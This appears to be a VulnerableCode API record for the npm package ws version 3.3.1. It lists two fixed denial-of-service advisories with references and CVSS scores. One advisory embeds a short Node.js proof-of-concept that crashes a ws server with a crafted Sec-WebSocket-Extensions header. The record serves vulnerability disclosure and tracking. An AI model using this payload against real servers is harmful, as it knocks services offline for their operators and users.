Package Instance
Lookup for vulnerable packages by Package URL.
GET /api/packages/53597?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/53597?format=api", "purl": "pkg:npm/ws@3.3.1", "type": "npm", "namespace": "", "name": "ws", "version": "3.3.1", "qualifiers": {}, "subpath": "", "is_vulnerable": false, "next_non_vulnerable_version": "5.2.4", "latest_non_vulnerable_version": "8.20.1", "affected_by_vulnerabilities": [], "fixing_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/11892?format=api", "vulnerability_id": "VCID-4851-mkc2-pqdw", "summary": "Denial of Service\nA specially crafted value of the `Sec-WebSocket-Extensions` header that uses `Object.prototype` property names as extension or parameter names can be used to make a `ws` server crash.", "references": [ { "reference_url": "https://github.com/websockets/ws/commit/c4fe46608acd61fbf7397eadc47378903f95b78a", "reference_id": "", "reference_type": "", "scores": [], "url": "https://github.com/websockets/ws/commit/c4fe46608acd61fbf7397eadc47378903f95b78a" }, { "reference_url": "https://github.com/websockets/ws/releases/tag/3.3.1", "reference_id": "", "reference_type": "", "scores": [], "url": "https://github.com/websockets/ws/releases/tag/3.3.1" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/53597?format=api", "purl": "pkg:npm/ws@3.3.1", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/ws@3.3.1" } ], "aliases": [ "GMS-2017-331" ], "risk_score": null, "exploitability": "0.5", "weighted_severity": "0.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-4851-mkc2-pqdw" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/13656?format=api", "vulnerability_id": "VCID-4u5m-kp7t-x3cf", "summary": "Denial of Service in ws\nAffected versions of `ws` can crash when a specially crafted `Sec-WebSocket-Extensions` header containing `Object.prototype` property names as extension or parameter names is sent.\n\n## Proof of concept\n\n```\nconst WebSocket = require('ws');\nconst net = require('net');\n\nconst wss = new WebSocket.Server({ port: 3000 }, function () {\n const payload = 'constructor'; // or ',;constructor'\n\n const request = [\n 'GET / HTTP/1.1',\n 'Connection: Upgrade',\n 'Sec-WebSocket-Key: test',\n 'Sec-WebSocket-Version: 8',\n `Sec-WebSocket-Extensions: ${payload}`,\n 'Upgrade: websocket',\n '\\r'\n ].join('\\r');\n\n const socket = net.connect(3000, function () {\n socket.resume();\n socket.write(request);\n });\n});\n```\n\n\n## Recommendation\n\nUpdate to version 3.3.1 or later.", "references": [ { "reference_url": "https://github.com/websockets/ws/commit/c4fe46608acd61fbf7397eadc47378903f95b78a", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/websockets/ws/commit/c4fe46608acd61fbf7397eadc47378903f95b78a" }, { "reference_url": "https://github.com/websockets/ws/commit/f8fdcd40ac8be7318a6ee41f5ceb7e77c995b407", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/websockets/ws/commit/f8fdcd40ac8be7318a6ee41f5ceb7e77c995b407" }, { "reference_url": "https://nodesecurity.io/advisories/550", "reference_id": "", "reference_type": "", "scores": [], "url": "https://nodesecurity.io/advisories/550" }, { "reference_url": "https://snyk.io/vuln/npm:ws:20171108", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://snyk.io/vuln/npm:ws:20171108" }, { "reference_url": "https://www.npmjs.com/advisories/550", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.npmjs.com/advisories/550" }, { "reference_url": "https://www.npmjs.com/advisories/550/versions", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.npmjs.com/advisories/550/versions" }, { "reference_url": "https://github.com/advisories/GHSA-5v72-xg48-5rpm", "reference_id": "GHSA-5v72-xg48-5rpm", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-5v72-xg48-5rpm" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/57135?format=api", "purl": "pkg:npm/ws@1.1.5", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/ws@1.1.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/53597?format=api", "purl": "pkg:npm/ws@3.3.1", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/ws@3.3.1" } ], "aliases": [ "GHSA-5v72-xg48-5rpm", "GMS-2019-145" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-4u5m-kp7t-x3cf" } ], "risk_score": null, "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/ws@3.3.1" }